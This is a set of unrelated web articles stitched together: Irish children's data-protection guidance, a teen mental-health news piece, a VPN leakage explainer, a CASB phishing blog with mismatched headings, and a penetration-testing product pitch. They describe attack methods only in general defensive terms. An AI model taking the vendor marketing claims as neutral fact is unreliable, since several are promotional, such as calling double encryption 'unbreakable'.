- Zero interference with a child’s best interests, where organizations rely on legitimate interests as their legal basis for processing;
- “Know your customer” requirements focusing on child-oriented transparency; and
- Specific guidance around age verification and consent
The overall aim of the Fundamentals, in protecting the best interests of children, is to at least set a default floor of high standardised protection for all data subjects where children may form part of a mixed user audience.
A Pyramid of Protection
A pyramid of protection for children’s rights informs the Fundamentals. The Irish Constitution, the dynamic foundation of Irish law, guarantees to protect and vindicate the ‘natural and imprescriptible rights of all children’. In addition Ireland ratified the UN Convention on the Rights of the Child and the assigned UN Committee published a general comment in 2021 explicitly stating that children’s rights under the Convention apply to the digital environment. The case law of the ECJ and the European Court of Human Rights fleshed out those rights in specific detail prior to the birth of the GDPR. The DPC places the guidelines within that prism of law and so reflects and relies on these broader legal protections for children to frame its Fundamentals.
Consistent with the GDPR, the Fundamentals confirm that children have the same rights as adults over their personal data. Their data does not belong to any other interested party, such as their parents or guardians. Children are given the same rights as adults to transparent processing, access, rectification, erasure, portability, restriction, objection, and freedom from automated decision making.
However, this is easier said than done. Determining the optimal way to balance children’s rights and the commercial mission of companies can be tricky given varying cultural norms and ever evolving digital dynamics. While veering towards prescriptive at times, the Fundamentals aim to guide and will be persuasive in legal fora, particularly given the DPC’s role as lead regulatory authority for many of the major on line platforms.
The Fundamentals provide details on how the GDPR’s legal bases should be applied to the processing of children’s data, guiding the following observations:
- All legal basis for processing are equal to each other under the GDPR. Consent does not therefore assume a higher ranking.
- Where relying on consent, however, organizations should ensure that children are given real choice over how their personal data is used and are capable of giving informed consent.
- As with employment, the guidance states that data controllers must take account of any imbalance of power inherent in the relationship with the user-child and must consider whether such consent can truly be deemed to be “freely given.” A capacity assessment may be necessary to assess this, which would likely require additional resourcing and expert teams, as an inevitable consequence of the decision to provide services to children using consent as a legal basis. In practice, this will make it more difficult to rely on consent as the legal basis for processing children’s data.
- Reliance on contractual necessity will also prove difficult, given what the guidance refers to as the “complexities, nuances and antiquated nature of elements of this area of Irish contract law.” Under Irish contract law, minors under the age of 18 have limited legal capacity beyond contracts for necessities.
- Using compliance with a legal obligation as the legal basis for child data processing, requires identification of the specific legal obligation being relied on, why it is necessary to rely on it for processing a child’s data but without it being a barrier to safeguarding and protecting the best interests of the child.
- While the vital interests of the child may form the legal basis for processing, child protection measures should take precedence over data protection considerations. The guidance states, in relation to this basis of processing, that ‘the GDPR and data protection in general, should not be used as an excuse, blocker or obstacle to sharing information where doing so is necessary to protect the vital interests of a child or children.’
- Likewise, for reliance on the performance of an official or public task as a legal basis, the DPC guidance should be complied with, “save where the public interest and/or the best interests of the child require otherwise and the organization can demonstrate why/how this is the case.”
- But using legitimate interests as the legal basis to process children’s information will be is particularly difficult under the Fundamentals. Under the GDPR a balancing exercise between the necessity of an organizations legitimate interests and the rights of data subjects is required if the organization seeks to rely on that as the legal basis for such processing. However, using the legitimate interest basis for processing children’s data, while not impossible, is actively discouraged in Fundamental 3 with a zero tolerance approach to encroachment on a child’s best interests. While this approach was not popular with the technology sector during the public consultation, the DPC guides that ‘the child’s interests or fundamental rights should always take precedence over the rights and interests of an organization which is processing children’s personal data for commercial purposes.” Also, the DPC guides that “in circumstances where there is any level of interference with the best interests of the child, this legal basis will not be available for the processing of children’s personal data.”
Further Processing Concerns
Beyond the legal bases above, the Fundamentals provide further guidance on a wider array of child data processing issues, guiding the following observations:
- Age is addressed in two respects – the age of digital consent and age verification. The digital age of consent in Ireland is currently 16, though it is subject to review this year. Where an offering to any child under that age is based on consent, it must be via parental/guardian consent. Fundamental 2’s “Clear-cut Consent” states that it is “of critical importance” that this requirement does not operate to prevent a child accessing a service. Nor should such consent from children or their parents be used as a way to treat children of all ages as if they were adults.
- Organizations are expected to make “reasonable efforts” to verify parental consent where given on behalf of a child under the age of 16. While leaving it up to the companies to decide how best to achieve this, the DPC guides a higher burden of verification for technology and internet companies given the “scale, specialities and resources” available to them and the higher risks to their child users. All methods of parental verification are expected to be proportionate, risk based and “not overly intrusive” The DPC refers to methods endorsed by the equivalent regulators in other jurisdictions which could act as a blueprint, noting in particular 7 specific U.S. FTC methods (see pages 42-43).
- “Your Platform, Your Responsibility” is Fundamental 9. Under it, the DPC expects those selling goods and services through digital and online technologies to go the “extra mile” in their age verification measures. The DPC “considers that a higher burden applies to such organizations in their efforts to both verify age . . . and verify that consent has been given by the parent/guardian of the child user.”
- Given its position on the use of legitimate interests as a legal basis for processing, it is not surprising that the DPC opines that profiling and targeted behavioural advertising “will generally not satisfy this principle of zero interference with the best interests of a child.” In essence, profiling and marketing to children is a no-go zone unless it is clearly in the best interests of the child. It is difficult to see how that might be the case in most commercial environments.
- While some marketing can be consented to by children, the DPC suggests that “in any case where an organisation is considering directing marketing activities towards children, it should be extremely cautious about doing so.” For those under 18, the best interests of the child “remain paramount.” Organizations who decide to directly market to children should, the Fundamentals guide, be able to demonstrate how this is in the child’s best interest, irrespective of commercial interests. The DPC also refers to the International Chamber of Commerce, Advertising and Marketing Communications Code’s promotion that a child’s personal data should not be used to target marketing towards other family members, without parental consent.
- The Fundamentals follow the EDPB’s position that children are entitled to information about the processing of their data, irrespective of the legal basis for processing. Clear and plain language is of particular importance to make such information understandable to the child.
- “Knowing your Audience,” “Information in Every Instance,” and “Child-oriented Transparency” are Fundamentals 4, 5, and 6. They require child-specific protective measures tailored to various age ranges of child users or, in the alternative, a baseline set of information which is clear and simple enough for all users, regardless of age, to access and understand.
- Organizations are asked to use clear, simple language in explaining data protection to children with non-textual measures such as cartoons, videos, images, icons or gamification recommended depending on user ages. Also recommended is the use of methods relevant to the service being offered, g. for a video sharing platform, a video may be the best way to communicate to child users. The Fundamentals recommend that information should be provided to children up front, should encourage them to be curious and cautious about their personal data, and encourage them to seek parental guidance.
- Further, the DPC guides that, if children have questions about the information they receive, they should be able to easily interact with the organization if unsure about the information they receive. Examples include instant chat, a dedicated email address, or a privacy dashboard. The DPC also guides that providing explanations to children on settings switched off or denied to children by default, and warning boxes with explanations where a child tries to deactivate such settings, should, as a protective measure, be built in to the service.
While recognizing that there may be some tension between a child’s right to data protection and rights to freedom of expression and association, the DPC states that there should be no need for a tradeoff between empowering and protecting the child in the digital environment. A child’s best interests should be the guiding principle and should be assessed and analyzed with expert assistance, as appropriate. The DPC expects organizations to document these assessments in Data Protection Impact Assessments (DPIAs) tailored to different types of processing having regard to ages and capacities, of users and their developmental needs. Completing and documenting “thorough and meaningful” DPIAs is a “key act of compliance” and will be a factor in the DPC’s assessment of an organizations overall GDPR compliance.
The DPC also suggests that organizations processing children’s data should consider doing a Child Rights Impact Assessment, using the UN Convention on the Rights of the Child to frame the assessment. This, according to the DPC, is “a powerful tool” for translating the best interests principle into practice.
The Fundamentals aim to fill in for the implementation gaps left by some lofty, but unspecific, GDPR provisions. They give a clarity that will undoubtedly be useful not just to the organizations to which they are directed, primarily those processing millions of child users’ data, but also to litigators and courts. However, they will inform the approach of the DPC in its regulatory remit so will have strong persuasive effect.
While acknowledging that these organizations have discretion on how they comply with aspects of the GDPR, the DPC notes such discretion “does not imply an excuse for inertia, inaction or rejection” of the guidance provided in the Fundamentals. “The best interests of the child must ground the actions of all data controllers, and there must be a floor of protection below which no user, and in particular no child user, drops.”
The Fundamentals are now in place, having taken effect immediately upon publication on the 17th December 2021. | <urn:uuid:cbf92a94-9d34-4c7e-8b47-d89ba4f1d1cf> | CC-MAIN-2022-40 | https://www.insideprivacy.com/childrens-privacy/dpc-publishes-guidance-on-processing-childrens-personal-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00341.warc.gz | en | 0.930711 | 2,886 | 2.859375 | 3 |
The number of depressed teens and those with anxiety disorders is growing, and psychiatry experts are blaming sexting and online bullying for it.
Figures from the Priory Group, the country's largest organisation for mental health hospitals and clinics, show admissions for anxiety in teenagers has risen by 50 per cent in only four years, the Daily Mail reports.
Back in 2010, a total of 178 boys and girls aged 12 to 17 were admitted to one of its centres with severe depression or anxiety. In 2014, that number rose to 262. What’s even scarier is the fact that this number is even bigger, as there are hundreds of others on waiting lists who have been referred by GPs but have not yet been seen by a specialist.
Psychiatrists say sexting and online bullying are the main reasons behind this surge in depression and anxiety. Sexting is the act of sending sexually explicit messages, primarily between mobile phones, and teens send it to their friends who then comment.
They say some see it as a 'form of courtship' and the chance to be noticed by the opposite sex.
But the photos can provoke extremely unkind comments, particularly if unflattering images of someone are sent round behind their backs.
Then there are also sites such as Ask.fm, where people can ask anonymous questions to one another. The aforementioned site was blamed for the death of four teenagers back in 2012 and 2013. All of them were victims of online bullying, where other kids, under the protection of anonymity, bullied and harassed the teens to their death.
Raj Samani VP and CTO for McAfee EMEA, comments: "It’s very upsetting to see that sexting and online bullying are having such an impact on the number of depressed teens and those with anxiety disorders.
"Recent research from Intel Security (opens in new tab) also highlighted the risks for teens, revealing that 67 per cent of children in the UK were allowed to go online unsupervised last year, an increase of almost 15 per cent from the year before - clearly showing a disconnect between what parents think is happening online and what is going on in reality.
"With over a third (35 per cent) of children admitting to experiencing cyber bullying first-hand and 40 per cent confessing to having witnessed cyber-bullying over the last year, it is important that parents not only speak to their children about online safety, but have ongoing conversations, ensuring they keep abreast of the latest social networks, online trends and security measures, so they’re fully armed with not only the right safety technologies, but also the knowledge needed to provide parental guidance both on and offline.
"It’s also imperative that if parents are setting up social profiles for their children, they feel empowered to be able to set the right security and privacy settings for their family across all devices."
Image Credit: Luis Sarabia | <urn:uuid:c61dfe87-b57d-48ad-9fc1-0998d45809c7> | CC-MAIN-2022-40 | https://www.itproportal.com/2015/05/11/number-depressed-teens-rising-experts-blame-sexting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00541.warc.gz | en | 0.963262 | 597 | 2.578125 | 3 |
All commercial VPNs have been marketed as the best and most convenient pieces of technology for users looking to improve their privacy. VPN providers make bold affirmations, like, “we provide 100% Internet privacy protection, avoid tracking and monitoring, and even circumvent censorship and geo-restricted content.”
But what many people don’t know is that VPNs were initially created to extend private networks (LANs/WANs) to other geographies using the Internet — (NOT really as privacy tools).
So, the word “Private” in Virtual Private Network could be the one stirring up the confusion.
In this post, we’ll demystify the popular VPN, as they are also vulnerable to security breaches and data leaks. Especially now, as more and more organizations are using enterprise VPNs as well. We’ll go through the most common ways VPNs leak data. The most obvious is when VPNs keep logs and sell (send) it somewhere. But VPNs may also fall victim to cyberattacks. If they don’t have strong encryption and the proper configuration, they’ll likely be hacked. Additionally, you’ll also learn how to avoid data leakage in any VPN.
VPNs also get hacked.
In August 2020, a hacker compiled a list of plain-text usernames, passwords, IP addresses, and other sensitive information from more than 900 enterprise Pulse Secure VPN servers, according to a ZDNet article. Of course, as a “good samaritan” black-hat hacker, he went on and published the list on a ransomware forum on the dark web.
Anyone with their hands on the list could use the information to gain remote access to internal corporate networks and make money by kidnapping sensitive data.
In another case, one of the most popular VPN services, NordVPN, was also a victim of a security breach. One of their servers in a data center in Finland was hacked in March 2018. NordVPN acknowledged the breach in Oct 2019 — a year later. Although the breach didn’t compromise any user information and was considered minor, the customer’s Internet traffic was at the hands of a hacker and prone to a man-in-the-middle attack.
VPNs are vulnerable to cyberattacks, and should be used with caution.
The Misconfigured VPN Service
Pulse Secure VPN and NordVPN are not the only victims of attacks. Most VPN providers have had some form of minor-major attack that led to a data leak. For example, TorGuard and VikingVPN also suffered from a similar attack in Oct 2019 (one acknowledged and the other didn’t). Private Internet Access (PIA) VPN also had to face an IP address leak in its port forwarding feature in 2015.
When the VPN service, whether it’s a commercial VPN or enterprise VPN, gets hacked, the provider and its corporate customers will be affected. After all, what the hacker is really after, is either corporate’s or end user’s data.
How a Misconfigured VPN Leaks Data?
1.IPv6 and dual-stack networks are vulnerable to VPN data leaks. When users want to migrate into IPv6, but are still under an IPv4 network, they can use both versions of the IP protocol. According to a research paper from 2015 “A Glance through the VPN Looking Glass: IPv6 Leakage and DNS Hijacking in Commercial VPN clients,” almost all VPN service providers at that time (and still today) are ignoring the IPv6 routing table. So all IPv6 traffic bypasses the VPN gateway interface — that means no VPN tunnel for IPv6 traffic. Additionally, VPN services that only consider IPv4 will also ignore the IPv6 DNS lookups and ultimately expose DNS information.
2. WebRTC data leaks. WebRTC (Web Real-Time Communication) is a protocol that provides most web browsers the capability to establish voice, video, and P2P communication without any add-ons. Unfortunately, WebRTC has inherited security flaws for web browsers, VPNs, and firewalls. When WebRTC wants to establish its communication to a remote client via STUN (Session Traversal Utilities for NAT) servers, WebRTC looks for the local client’s IP address using the Interactive Connectivity Establishment (ICE) protocol. The ICE protocol finds and reveals the IPv6 address of the local client to the STUN server (regardless of being connected to a VPN). This vulnerability only happens with IPv6 because it uses the same IP for private and public networks.
3. Old and vulnerable VPN technologies. VPN protocols such as PPTP with MS-CHAPv2 can be easily broken with brute-force attacks. Even though PPTP is considered one of the weakest VPN protocols, many VPN providers are still using it. And even with stronger protocols, such as SSL-VPN, some providers are likely to leave it with security vulnerabilities. According to a UK’s National Cyber Security Center published a document exposing Advanced Persistent Threat (APT) actors that pose a threat to SSL-VPN products from popular vendors, Pulse Secure, Fortinet, and Palo Alto. With these vulnerabilities, hackers can retrieve any file, including sensitive authentication credential files, through a Remote Code Execution (RCE).
Data Retention, Another Privacy Compromise
VPN data leaks do not only happen due to misconfigured protocols and encryptions. But there is also another bad practice followed by some VPN providers that compromise its customers’ privacy: Data Logging and Retention.
Although enterprise VPN service providers would typically avoid logging and retaining customer’s data, there are cases where they are required by law to save logs. For example, The 5-EYES (FVEY) nations is an intelligence/surveillance alliance between five countries: the US, the UK, Canada, Australia, and New Zealand. Some governments in countries like China, Russia, and Sweden also mandate VPN providers that have servers in these countries to retain logs from six months to 10 months.
These countries have some level of mandatory data retention and search warrants to allow intelligence agencies (FBI, feds, police, copyrights, etc.) to push VPN providers to hand over logs from their customers. That would include traffic, IPs, geo-tracking, browsing cookies, and additional sensitive information.
Of course, free VPNs are out of the question — as they inevitably log traffic data and sell it for marketing purposes. Without some form of cash return, free VPN service providers wouldn’t exist. In fact, according to an article from the Verge, most of the free VPNs, especially for Android, leak data, and some of them don’t even use encryption!
How to Avoid Data Leakage from VPNs?
So now that you know the ins and outs of how VPN leaks data, let’s see what you can do to avoid data leakage. The first thing to remember is obviously (as pointed out before) to use VPNs to extend networks, not as privacy tools.
Also, follow the best next practices and tips to avoid breaches of your data:
1.Avoid weak VPNs. Avoid VPNs that do not advertise their encryption mechanism and avoid the ones that use outdated PPTP protocol. You can also check whether your VPN traffic is encrypted with a packet sniffer such as Wireshark.
Professional VPNs are now using a military-grade encryption AES-256 and they will even provide double encryption, which is unbreakable. Another great feature to look for is Kill Switch, which immediately turns off the Internet when the VPN gets disconnected.
If you suspect a data leak, test the VPN with a packet sniffer, such as Wireshark (not a VPN’s official tester). While connected to the VPN, you shouldn’t be able to find unencrypted DNS and IPv6 information. To test WebRTC leaks, you can use the Browserleaks service.
2. Find out about a VPN’s reputation. VPNs are hackable, and most providers (including VPNs that cater to enterprise clients) have been breached some way or the other. Look around the web for news of any historical data leak regarding the VPN provider. If they took action immediately, created a fix, and announced publicly, that’s a positive thing. They want to build trust. And trust is the only thing that can save a VPN’s reputation.
Otherwise, if they concealed the breach, they are likely to do it again. You can run a test at Have I Been Pwned? to check if your personal data has been compromised in a data breach, by a VPN or any other cloud-based service.
3. Look for VPNs based in friendly data-jurisdiction countries. Considering the location of where the VPN provider is registered (as a business) may give you an idea about the data jurisdiction. Avoid VPN providers that are based on the 5-EYES, 9-EYES, or 14-EYES. Any country on the 14-EYES might force the VPN to hand over data logs, ultimately compromising your privacy — if that’s a concern for your organization.
Read through a VPN’s no-logs policy carefully to ensure that third-party authorities will not breach your data.
Data leaks are common across all kinds of VPNs— from free, business, to enterprise VPNs have been subject to some security breach. Of course, free VPNs will intentionally log your data and leak it to third-parties. And depending on the data’s jurisdiction where a business/enterprise VPN is headquartered, they might also be keeping your logs.
VPN service providers also leak data unintentionally. They are still relying on outdated technology vulnerable to data leakage, especially in dual-stack networks (IPv4 and IPv6). The VPN will encrypt IPv4, but fully expose IPv6 information, leading to DNS and WebRTC leaks.
To steer clear from VPN’s data leakage, look for VPNs with strong encryption and rich features. It is also critical to look into their history and reputation; have they had a breach before? Were they honest about it? And published the vulnerability+fix right away?
Looking for VPN alternatives? Check our VPN vs. Remote Access Solution.
We hope that this article was informative. Please leave any comments and suggestions below! | <urn:uuid:b2b43d56-8cc6-4db8-8f16-f9b1bc52b6b9> | CC-MAIN-2022-40 | https://en.cloudbric.com/blog/2020/09/virtual-private-network-data-leakage/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00541.warc.gz | en | 0.933739 | 2,175 | 2.734375 | 3 |
Email technology suffers from a bum rap. It is being handled as a cumbersome emailing program, which was originated to work on a machine that came before services, and now has been rumored as dead. But, this rumor is completely wrong! In today’s date, this particular program is used in an extensive manner wherever communication is essential to carry normal business activities. The ‘open’ nature of this program makes it useful but, also insecure. In order to use the email system in a secure manner, now it is an essential need to adopt the best security practices for mailing environment platform protection. These preventive measures make core emails indispensable even when they have openness nature. We don’t know that whether you’ll believe it or not but, it is true that ‘Now also (in the year 2019) internet criminals find it easy to perform phishing attacks via the email communication system.’ Targeted individuals are forced by deception and manipulation strategies, resulting in compromised accounts and loss of data and money. Phishing attacks have now become a sort of moneymaking business for fraudsters. This leads to arising in need to adopt best security practices for awareness and protection even more than ever before.
Phishing Attacks – Topmost Email Attack
Aimed phishing attacks are not just about fake email support or password reset messages but, it includes complicated social engineering tactics to earn money or fetch information from targeted machines. Its a latest con that experiences no limits offers an open gate, and has a less secured entry barrier for millions of potential checks increasing the businesses ranks globally.
According to the FBI’s Internet Crime Report 2017, it has been observed that BEC (Business Email Compromise) attack, which is a form of targeted phishing proposed to defraud organization, costs an average target over $43,000. In the month of May 2018, FBI updates its strength, giving the statement that – Over the last 5 years, the attack has cost enterprises more than $12 billion. Therefore, it is important for end users and enterprises to have concern with the fact that more cybercrimes are originating daily and these may result in data breaches at any time. The consequences of Cyber attacks result in a way that cannot be imagined by anybody. Beyond the clear challenges presented by compromised numbers of credit card and social security, the existing information could be accessed to gather more data and then, get easy entry into the potential targets with social proof strategies. These knock-on consequences of information exposure incidents that give call for a rapid remedy action and active the responsible staff at that particular time period.
Let’s Have A Closer Look On Email Security Threats
Following listed are some latest email security threats that are outlined in the report of X-Force :
- Business Email Compromise – Nowadays popular cloud service vendors are providing free of cost service of multi-factor authentication to their customers. Microsoft Office 365, Google cloud platform, Amazon web service, etc., are rendering MFA option to their clients without paying extra cost for the same. This means that it is the responsibility of cloud users to activate the MFA authentication measure in their online account. It will safe people from Cybercrimes that are caused due to unauthorized account access.
- Plan for Regular Updates – A malicious web link in an email message directs receiver towards the website where his or her tenant email id and password will be harvested. The particular receiver assumes that he or she is working on a secure internet site and are generally giving response to the information required on malicious website. But, here, in this case, the reality is completely opposite to what the receiver is assuming! This trustworthy mindset of people allow intruders to gain their desired information and hence, perform actual threat to harm the company.
Best Security Practices to be Safe From Phishing
Solutions are many, only thing is that enterprises have to adopt them. Until and unless you are just reading the post but, not implementing security standards, then, reading this blog is completely a time wastage. Therefore, we strongly recommend our readers to begin with implementation and execution of these best security practices just after reading and thoroughly understanding them.
- Make Use of MFA Method – BEC attacks has grown in these recent years. Also called as whaling, this cloud security threat comprises of a hacker who impersonate as a high-level official and tries to influence an employee or client to release information money transactions or sensitive information. For example – Sometimes a fraud call comes on phone in which the caller pretends to be a bank executive and tries to convince customers to give their credit card information.
- Malicious Links or Attachments – Vital vulnerabilities like Heartbleed and Shellshock always search for the heart of internet-connected components to perform attack. Therefore, it is important to plan software updates either on a weekly basis or daily basis. It would be okay if you go for a weekly basis but, it would be more effective and excellent to update on daily basis. We assume that at least one hour in a day can be taken out to check and update security applications with their latest version, used in your premises.
Give Headache to A CASB Solution Vendor
CASB solution vendors are the one who serves their customers with cloud security as a service. Their business growth is dependent upon the level of best security practices and services they provide to their organizational clients for safeguarding confidential records. One such known vendor is CloudCodes! It offers comprehensive best security practices that are needed to protect customers’ business from phishing, ransomware, Heartbleed vulnerabilities, etc. Also, the CloudCodes team give assurance to its enterprises’ clients that data will be remain secured, even if they begin use of BYOD technology in their premises. | <urn:uuid:415a24c6-7f62-474c-ac6b-d08460882308> | CC-MAIN-2022-40 | https://www.cloudcodes.com/blog/best-security-practices-phishing-attacks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00541.warc.gz | en | 0.940597 | 1,171 | 2.546875 | 3 |
A penetration test is the process of uncovering and exploiting security weaknesses in order to evaluate the security stance of an IT infrastructure. Using the techniques of a real attacker, pen testers intelligently determine risk and prioritize critical vulnerabilities for remediation.
Just as threat actors use tools to swiftly compromise an environment, pen testers use tools like Core Impact to streamline the process of gaining access by automating routine tasks so they can handle more dynamic issues. Additionally, such penetration testing tools can be used by security team members who may not have an extensive pen testing background, using them for tests that are easy to run, but essential to perform regularly, like validating vulnerability scans.
To better demonstrate how a pen testing solution like Core Impact can bolster your organization’s security, we have put together several use cases of the fictional Acme, Inc., which show how Core Impact allows security teams to safely and efficiently test your environment using the same strategies as today’s adversaries.
Use Case: Vulnerability Validation
Security Analyst Mary Jackson is in charge of running regular vulnerability scans of her organization’s environment. The scanner turns up multiple vulnerabilities, and Mary is unsure of which vulnerability to try and resolve first.
Vulnerability scanners are an excellent security tool that examine an environment and uncover vulnerabilities that may be putting an organization at risk. A vulnerability scan report may list the corresponding Common Vulnerabilities and Exposures (CVE) number with each vulnerability, which is a unique id number that is assigned to known vulnerabilities. CVEs are given a rating using the Common Vulnerability Scoring System (CVSS) to classify how severe these vulnerabilities are on a scale of 0-10.
However, scanners can uncover hundreds, or even thousands of vulnerabilities depending on the size of an IT environment, so there may be enough severe vulnerabilities that the scoring system doesn’t provide enough clarity on where to begin. Additionally, while this system may help give an idea of how much of a risk each vulnerability poses, it does not take context into account. While a vulnerability may be scored as a 10, it may not actually be posing as big of a risk to Acme because the vulnerability is on an isolated system that requires direct access. A vulnerability with a lower rating may actually have the potential to cause more damage based on its location and ability to be leveraged for further attacks.
Ultimately, vulnerability scanners are intended to provide a broad picture of your security posture, but more insight is needed to fully prioritize the list of vulnerabilities uncovered.
Mary could use a penetration testing tool like Core Impact to fully prioritize the list of vulnerabilities uncovered. Penetration tests can validate vulnerabilities by investigating whether or not a vulnerability can be used to gain access, and if so, how difficult that effort would be. The results of such a pen test would produce a list based on the risk the vulnerabilities pose to the organization’s specific infrastructure.
Core Impact integrates with numerous third-party scanners, like Frontline, Burp Suite, Nessus, and Qualys, directly importing their scan data to run an automated test for vulnerability validation. Core Impact will evaluate the scan's output and provide you with prioritized validation of your system's weaknesses.
Use Case: Automation
In order to extend their vulnerability management program, Acme would like to run penetration tests on a regular basis.
Oftentimes, organizations that look into building a penetration testing program assume they need to regularly use a third-party service or hire their own team of experienced testers. However, there has been an ongoing skills shortage in the field of cybersecurity that shows no sign of resolving anytime soon. In fact, according to the 2022 Pen Testing Report, 34% of respondents answered that lack of talent/skillset were why they did not run pen tests, and 36% of respondents said that hiring enough skilled personnel was one of their top pen testing challenges.
This can be an issue for both third-party and internal teams. Reputable, skilled, third-party pen testers can only run so many engagements, and may not be able to accommodate such a frequent cadence. Alternately, the organization’s budget may not be able to sustain hiring pen testing services for more routine tests. For internal teams, experienced testers may not be available for hire, and those that are often come with a high price tag.
Manual pen testing can also be quite lengthy and labor intensive. Even though teams and individual testers use penetration testing tools, they are often relying on mix of multiple open-source tools, which means switching back and forth between solutions and manually combining information for reporting.
Because of these time and budget constraints, organizations may, at most, only be running tests annually, which is typically not sufficient. An organization may add additional assets or upgrade existing ones throughout the year, and their security should not have to wait so long to be validated. Further, retesting, which involves rerunning the same tests as a previous pen testing session, is critical in order to verify that remediation efforts were successful.
An automated pen testing tool like Core Impact can easily streamline the penetration testing process. Firstly, Core Impact addresses the pen testing skills gap. While experienced pen tests will always be needed for complex engagements, not every test requires an expert.
Core Impact enables team members who don’t have a deep background in pen testing to be able to run basic, though vital, tests using Rapid Penetration Tests (RPTS). These step-by-step wizards safely guide a tester through exercises like network information gathering or privilege escalation. Even general tests that validate remediation can be straightforward and automated. This allows organizations to run tests more frequently while still maintaining efficiency, and without having to dramatically increase headcount.
Secondly, Core Impact’s centralization both reduces console fatigue and standardizes reporting. As a comprehensive tool that can test across multiple vectors, every phase of the penetration testing process can be executed and managed in one place. Additionally, Core Impact offers multiple integration and collaboration capabilities with tools like Plextrac, Metasploit, Burp Suite, and Cobalt Strike for further centralization. With all of this information in one place, reports can be automatically generated instead of manually combining them piecemeal from different tools.
Use Case: Compliance
Since Acme has its own retail business, they are required to adhere to the PCI DSS security standards.
Most organizations must adhere to some type of industry or government security regulation, like SOX, GDPR, HIPAA, or NIST. In this case, PCI DSS is administered by the Payment Card Industry Security Standards Council and focuses on moving all retailers (and other industries) who use credit/debit cards into stronger and more predictably tested security postures, which can dramatically reduce credit card fraud.
Not adhering to PCI DSS can result in multiple issues. Firstly, these requirements are intended to safeguard an organization from data breaches, so failing to meet these best practices dramatically increases the risk of a successful attack. In the short term, breaches can disrupt or halt productivity. In the long term, they can take a great deal of time and money to recover from. Additionally, it may permanently damage the reputation of a business, which can result in fewer sales, and diminished confidence from investors. Not only that, credit card companies may no longer want a contract with the organization, so the business can no longer accept those cards for any transaction. Liability issues may also have to be resolved in court.
Lastly, failure to comply can also result in serious fines ranging from thousands to millions of dollars. It’s also worth noting that part of PCI DSS, as well as many other regulations, is being able to prove compliance—those without thorough reporting or documentation may still end up failing an audit.
The PCI standards currently consist of 12 main requirements, and over 200 sub-requirements. Requirement 11.3 mandates the development and implementation of “a methodology for penetration testing that includes external and internal penetration testing at least annually and after any upgrade or modification.”
Luckily, penetration testing can kill two birds with one stone. If a penetration test has proper reporting, it can not only show that a pen test was conducted, but can also prove compliance to other requirements or sub-requirements. In fact, 99% of those surveyed for the 2021 Penetration Testing Report said they used pen testing to maintain and demonstrate compliance for at least one regulation, such as SOX, HIPAA, or GDPR.
These regulations aim to protect sensitive data that is valuable to attackers, which can include customer or patient information, financial records, or even employee files. Periodic mandated testing ensures organizations stay compliant by uncovering and fixing security weaknesses that may be putting this data at risk. Additionally, for auditors, these tests can also verify that other mandated security measures are in place or working properly.
A penetration testing tool can make adherence to any regulation simple to implement, minimally disruptive, and budget-conscious. Core Impact provides an easy to follow and automated framework that can run internal and external tests, and also doesn’t require the security team to have extensive pen testing experience. Additionally, Core Impact’s automated reporting features ensure consistency and increase efficiency, creating a thorough record for all aspects of a pen testing engagement.
Use Case: Infrastructure Upgrade Validation
As Acme continues to grow and evolve, the IT environment must do the same. Consequently, additional servers are added, new solutions are added to the tool stack, and existing tools are upgraded to the latest versions.
Despite all efforts to create and distribute a secure product, there are countless software (and even some hardware) releases that contain vulnerabilities. So while upgrades and new assets bring exciting new capabilities and features, they also bring in the potential to become attack vectors for malicious actors seeking to gain access. Depending on the severity of the vulnerability, a threat actor could gain access to credentials, escalate privileges, or even take control of the root account.
Once vulnerabilities have been discovered, advisories are typically released with details on workaround patches, or other ways to mitigate risk. If an organization hasn’t run a pen test after adding new assets, they may not be aware of how much of a risk it poses to their organization, or may not even know the vulnerability exists in their environment. Even when patches exist and are applied, they may not have been implemented correctly, leaving the vulnerability intact.
As an organization’s infrastructure changes, either through upgrades or adding additional assets, it’s critical to pen test regularly. A single pen test serves as a baseline. An integral part of pen testing strategies is to retest frequently against that baseline. Retesting helps ensure that that security holes have been closed when remediation efforts have been made and can uncover new weaknesses that may be present in new assets or updates.
Having a pen testing tool like Core Impact can help to enable and streamline the retesting process. Organizations without a distinct internal team may rely entirely on third-party services, who they may only be able to enlist once a year. Having a pen testing tool allows any organization to run basic, routine tests, like validating vulnerability scans. These simple tests can be all that’s needed to verify that new vulnerabilities are present.
Core Impact has a certified library of exploits that is kept up to date to test against the latest vulnerabilities. Additionally, Core Impact can save testing sessions when they are initially run, logging what attack paths were used. These tests can then be automatically rerun at a later time for remediation validation. Comparing reports from both tests can also show if any new vulnerabilities have been uncovered as well as revealing if patches were correctly applied and functioning.
Use Case: Increasing Workforce Awareness
Acme Inc. recently experienced several small breaches. While tools in their security stack detected and prevented these breaches from doing significant damage, security analyst Annie Easley is still concerned about where these breaches originated. Upon analysis, it is discovered that several employees received emails that they thought were from customers, and opened an attachment, not knowing it held a suspicious payload. Annie wants to know how aware the rest of the employees are of such dangers.
Software vulnerabilities can be patched and misconfigurations can be corrected, but there is no closing an organization’s biggest security hole—its employees. Though phishing is an old technique, it is still an effective one that attackers regularly rely upon to solicit sensitive information or directly breach a system.
While spam filters can block out a portion of phishing emails, they are typically the most basic ones that are more easily recognized. However, many can still slip through, particularly spear phish, which are tailored for an individual or organization. These are much more sophisticated, and can either realistically imitate an official business, or appear to come from an individual they know.
Administrators may be able to put more powerful blockers up or have notifications of external email addresses for the company email service. However, employees still regularly check personal email from their workstations or in the case of remote work, personal computers sharing a Wi-Fi router with a work computer are inadvertently connected to the network.
Victims of phishing attacks may never realize that they were the ones to open the doorway to a breach. If they are unaware of this knowledge, they may very well open another phishing email without thinking twice.
Using a pen testing tool like Core Impact would enable Annie to be able to run sophisticated simulated phishing campaigns. These campaigns are designed to give an organization data on how vulnerable they are to such attacks.
